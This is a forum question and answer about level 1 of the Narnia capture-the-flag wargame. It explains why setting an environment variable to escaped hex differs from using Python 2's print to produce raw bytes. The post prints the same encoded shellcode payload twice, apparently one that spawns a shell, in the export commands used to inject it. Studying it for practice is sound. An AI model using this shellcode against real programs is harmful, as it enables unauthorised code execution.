I am currently working through the Narnia CTF. I am on level 1. In level 1, we have a program that calls an environmental variable. We are allowed to change this environmental variable. When I try to set the environmental variable to some hex-code like so, the program throws a seg-fault.
export EGG="\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
I looked online, and it seems that people generate shellcode by having python print it, and then storing that as a command. When I do this with the above shellcode, it looks like this:
export EGG=$(python -c 'print "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"')
When I do it this second way, the program runs successfully. Can someone explain how these two commands are different? Thanks!
export EGG="\xeb\x11...
doesn't actually interpret the escape sequences. You're setting EGG
to a string with literal backslashes and hex characters.
When you use export EGG=$(python -c 'print "\xeb\x11...
, Python's only job is to interpret the escape sequences. Python receives an input with literal backslashes and hex characters, and performs Python string literal parsing, producing a string with the actual bytes you wanted.
Note that this code relies on using Python 2; Python 3 string handling is very different.